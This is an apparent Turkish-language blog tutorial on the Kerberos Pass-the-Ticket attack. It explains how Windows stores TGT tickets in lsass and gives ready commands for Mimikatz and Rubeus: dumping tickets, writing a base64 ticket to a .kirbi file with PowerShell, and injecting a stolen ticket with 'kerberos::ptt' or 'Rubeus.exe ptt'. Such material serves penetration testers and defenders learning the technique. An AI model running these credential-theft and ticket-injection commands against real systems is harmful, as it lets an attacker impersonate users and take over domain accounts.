Kerberos | Pass The Ticket (PTT)

Okunması gereken yazılar:

Bu saldırı Overpass The Hash saldırısına benzemektedir. Overpass The Hash saldırısından farklı olarak kullanıcının NTLM hash’i ile TGT bileti istemek yerine TGT biletinin kendisi çalınarak yetkilendirme işlemlerinde kullanılmaktadır.

Windows işletim sisteminde biletler lsass (Local Security Authority Subsystem Service) process’i tarafından depolanmakta ve kullanılmaktadır.

Lsass process’i tarafından depolanan ticket’lara erişmek için Mimikatz, Rubeus gibi araçlar kullanabilmekteyiz.

Linux’tan elde edeceğiniz ticket formatı (ccache) ile Windows üzerinden elde edeceğiniz ticket formatı (kirbi) farklıdır. Bu sebeple eğer Windows üzerinden elde ettiğiniz TGT biletini linux tarafında kullanmak isterseniz bir dönüştürme işlemi yapmak zorundasınız. Ticket_converter aracı ile bu işlemi kolaylıkla yapabilirsiniz.

Mimikatz aracı ile TGT biletlerini ele geçirmek için:

# sekurlsa::tickets /export

Rubeus aracı ile TGT biletlerini ele geçirmek için:

 .\Rubeus dump

Ticket’ları Rubeus aracı ile dump ettikten sonra aşağıdaki komut ile “ticket.kirbi” dosyasına yazıyoruz.

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

Elde ettiğimiz ticket’ları Mimikatz ve Rubeus araçlarını kullanarak PTT saldırısını gerçekleştirebilmekteyiz.

Mimikatz aracı ile PTT saldırısını gerçekleştirebilmek için:

mimikatz # kerberos::ptt <ticket_kirbi_file>

Rubeus aracı ile PTT saldırısını gerçekleştirebilmek için:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *